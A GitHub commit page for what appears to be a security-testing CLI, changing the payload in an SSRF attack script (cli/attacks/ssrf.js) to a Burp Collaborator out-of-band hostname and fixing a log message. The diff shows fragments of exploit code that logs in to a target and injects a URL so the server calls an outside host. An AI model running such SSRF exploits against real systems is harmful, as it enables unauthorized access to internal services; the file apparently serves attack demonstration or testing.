Skip to content

Commit

Permalink
Merge pull request #18 from DataDog/ccapell/ssrf-attack-changes
Browse files Browse the repository at this point in the history
Change SSRF attack payload
  • Loading branch information
Taiki-San authored Nov 7, 2024
2 parents 2a3e7e6 + 8ed1c41 commit 91d8237
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions cli/attacks/ssrf.js
Original file line number Diff line number Diff line change
Expand Up @@ -70,7 +70,7 @@ async function exploit(targetURL){
let info = await createAndLogin(targetURL)

await new Promise(r => setTimeout(r, 2000));
payload = "https://ojqweoim23edjkl2ndo23mdi203dm23.burpcollaborator.net:443/"
payload = "ojqweoim23edjkl2ndo23mdi203dm23.burpcollaborator.net"
spinner.text = 'Successful SSRF Injection: ' + payload;

const form = new FormData();
Expand All @@ -95,11 +95,11 @@ async function exploit(targetURL){
await new Promise(r => setTimeout(r, 1000));
spinner.stopAndPersist({
symbol: logSymbols.success,
text: 'Successful SQL injection attack - done',
text: 'Successful SSRF injection attack - done',
});



}

module.exports = { createAndLogin, basic1, exploit }
module.exports = { createAndLogin, basic1, exploit }

0 comments on commit 91d8237

Please sign in to comment.